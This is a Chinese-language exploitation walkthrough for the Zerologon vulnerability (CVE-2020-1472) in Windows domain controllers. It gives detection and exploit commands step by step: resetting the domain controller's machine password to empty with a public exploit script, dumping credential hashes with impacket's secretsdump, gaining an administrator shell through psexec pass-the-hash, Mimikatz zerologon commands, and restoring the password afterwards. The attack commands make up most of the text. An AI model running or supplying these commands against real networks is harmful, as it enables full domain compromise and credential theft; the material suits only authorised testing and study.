目录

漏洞简介

漏洞检测

漏洞利用

使用脚本进行利用

使用Mimikatz进行利用

恢复用户哈希

---

漏洞简介

CVE-2020-1472是继永恒之蓝漏洞之后又一个好用的内网提权漏洞，影响Windows Server2008R2至2019的版本。只要攻击者能够访问到目标域控并且知道域控计算机名即可利用该漏洞。

该漏洞不要求当前计算机在域内，也不要求当前计算机操作系统为Windows，该漏洞的稳定利用方式为重置目标域控的密码，然后利用域控凭证进行DC Sync获取域管权限后修复域控密码。漏洞利用过程中会重置域控存储在域中的凭证，而域控存储在域中的凭证域本地的注册表中的凭证不一致时，会导致目标域控脱域，所以在重置完域控凭证后要尽快恢复。

漏洞检测

利用脚本进行检测：GitHub - SecuraBV/CVE-2020-1472: Test tool for CVE-2020-1472

如果返回success，则表示漏洞存在。

python3 zerologon_tester.py 域控计算机名称 域控ip

 

漏洞利用

使用脚本进行利用

脚本地址：

GitHub - risksense/zerologon: Exploit for zerologon cve-2020-1472

https://github.com/fortra/impacket

1、查询域控机器用户的哈希

python3 secretsdump.py abc.com/Administrator:Admin@192.168.75.143  -just-dc-hashes "WIN-DC$"

2、修改域控账号哈希为空

python3 set_empty_pw.py 域控机器名名称 域控ip

3、再次查看域控机器账号的哈希，可以在线hash解码，发现查询结果是空密码

python3 secretsdump.py abc.com/Administrator:Admin@192.168.75.143  -just-dc-hashes "WIN-DC$"

4、连接域控机器用户账号，导出administrator用户的哈希

python3 secretsdump.py "abc/WIN_DC$"@192.168.75.143 -hashes [hash值]

5、连接域控管理员账号

python3 psexec.py abc/administrator@192.168.75.143 -hashes [hash值]

使用Mimikatz进行利用

如果当前主机在域环境中，则target 这里可以直接使用FQDN

lsadump::zerologon /target:WIN-DC.abc.com /ntlm /null /account:WIN-DC$ /exploit

如果当前主机不在域环境中，则target 这里可以直接指定 ip

lsadump::zerologon /target:域控ip /ntlm /null /account:WIN-DC$ /exploit

恢复用户哈希

python3 reinstall_original_pw.py WIN_DC 192.168.75.143 [hash值]